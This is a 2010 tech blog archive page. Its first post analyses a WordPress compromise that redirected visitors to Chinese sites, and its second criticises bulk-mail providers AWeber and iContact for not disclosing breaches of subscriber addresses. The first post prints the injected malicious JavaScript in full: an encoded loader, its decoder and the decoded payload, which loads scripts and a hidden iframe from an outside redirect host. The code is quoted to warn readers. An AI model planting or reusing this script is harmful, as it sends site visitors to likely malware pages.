February 2010 Archives

WordPress Exploits — Update WordPress Regularly!

By Kee Hinckley on February 3, 2010 9:24 PM | No Comments
WordPress

Image via Wikipedia

I just had a number of friends get nailed with a WordPress exploit which redirected users from their blog to sites in China. Exploits like this have been around for ages, and the constant need to update WordPress is one reason I use MovableType, which creates static sites and is therefore much less susceptible to this sort of thing, but be that as it may. CHECK YOUR BLOG FOR UPDATES REGULARLY!

I don't know the actual mechanism by which the code was inserted into the blog, it's a small piece of Javascript inserted into the PHP header file for the site. The one person whose blog I looked at in detail was running 2.6.1, which has an exploit which allows people to create their own admin account, but it could have been any other number of issues. The current version of WordPress as of this writing is 2.9.1. UPDATE!

For what it's worth, here's the code.

<script language="javascript">document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%2633%263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2%2631cpsefs%264E1%2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1')</script>

That produces a function which it then runs over the second, more randomly obfuscated code.

<script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>

That then results in:

<script>document.write("<script src=\""+"http://itsallbreaksoft.net/tds/in.cgi?2&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+ encodeURIComponent(document.URL)+"&default_keyword=notdefine"+"\"><\/script>");</script> <script> if(typeof(h)=="undefined"){ document.write("<iframe src='http://itsallbreaksoft.net/tds/in.cgi?3&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+ encodeURIComponent(document.URL)+"&default_keyword=notdefine' width=1 height=1 border=0 frameborder=0></iframe>"); } else if(h.indexOf("http:")==0){ window.location=h; } </script>

That code sends your browser on a wild goose chase through several servers, each of which is inappropriately allowing the user to create a redirect to yet another site. Some of those servers are probably compromised, because in the hour I looked at one site, the same exploit code sent me to different sites in China. I would rate the odds very high that those sites may contain malware exploits against some web browsers, so if you aren't up-to-date with your browser patches, it's time to run your anti-virus software and cross your fingers.

Reblog this post [with Zemanta]

Can you trust your bulk mail provider's security?

By Kee Hinckley on February 1, 2010 5:41 PM | No Comments
Note: I heard back anonymously from a customer of iContact. Are they upset that all their customer's email addresses were stolen? Yes. But they aren't that worried about the impact, because they know that most of their customers will never realize that iContact or their company was the source of the leak. In other words, there is no incentive for bulk mail providers to improve security. An email address, particularly one associated with a particular set of services, is the means by which targeting spammers target phishing attacks. It's the key to password changes, bank accounts, and more. Why are the security standards for email any less than they are for credit cards?

Every time a web site asks me for an email address, I use a unique address that includes their domain name in it. This makes it very easy for me to track when a company either misbehaves, or their mailing list has been compromised. Of course, often the company sending me the mail is using a third-party email provider to deliver, and here's the dirty secret.

When your email provider's database gets broken into, and a spammer gets all of their customer emails? They don't necessarily tell you, the client. And they certainly don't bother telling the poor sucker whose email address was stolen.

Image representing AWeber Communications as de...

Image via CrunchBase

Case #1—AWeber
Starting December 2009, I began receiving spam to the address I use for the help-a-reporter service. I filed a report with their existing bulk mail provider, but got no response. It turned out that HARO had only recently switched to this provider, the real culprit was their previous email provider. A discussion with Adam Shankman led him to research the issue and find out (from an article on the internet!), that his previous email provider had been compromised and all of HARO's email addresses had been fed to spammers. AWeber's subscriber list had been compromised, and they had told none of their customers until they started getting complaints. 

Image representing iContact as depicted in Cru...

Image via CrunchBase

Case #2—iContact
Today I noticed three identical spam messages to three different custom email addresses. They were for the morrisonsoftdesign.com, fontgear.net and myhappyplanet.com. I went back and found that a) it had been going on for at least a few weeks and b) all three companies do, or have used icontact.com to deliver their mail (morrisonsoftdesign.com switched providers at some point). So in other words. If you have an account with morrisonsoftdesign.com, fontgear.net or myhappyplanet.com, or any other company that uses iContact, your email address has almost certainly been fed to the spammers. But don't blame the company you subscribed with, the culprit is iContact. Other iContact customers include  (according to their web site) Peach Running Co., West Race Cars, Pro Mom Couture and 58,654 other customers with 577,545 email addresses. Feel free to let them know what you think of their ineptitude.

spam.png
It's unconscionable that these companies are not notifying their own clients of data breaches, let alone the end-users who end up getting spammed. If any of them have a presence in California, it is probably also illegal.


Related articles by Zemanta

Some updates after a little more research.
A search shows that a few other people have noticed the iContact breach, but no news from the company itself.
iContact has a blog post in which they admit that people have complained, and they casually admit that "the subscriber email address is the only data affected" but they imply that it was limited to a small number of people, although the other reports make it clear that at least half a dozen customers (with thousands of addresses) were impacted.


Reblog this post [with Zemanta]
« December 2009 | Main Index | Archives | March 2010 »

About this Archive

This page is an archive of entries from February 2010 listed from newest to oldest.

December 2009 is the previous archive.

March 2010 is the next archive.

Find recent content on the main index or look in the archives to find all content.

Subscribe via Reader

 Subscribe to TechnoSocial

Subscribe via Email

Enter your email address:

Delivered by FeedBurner

Tag Cloud

About Me

I'm the CEO/CTO of Somewhere, Inc., a company building a unified social networking layer that gives people the means to track their friends across multiple social networks.

Categories

Creative Commons License
This blog is licensed under a Creative Commons License.

Search

Lijit Search

Recent Entries

Archives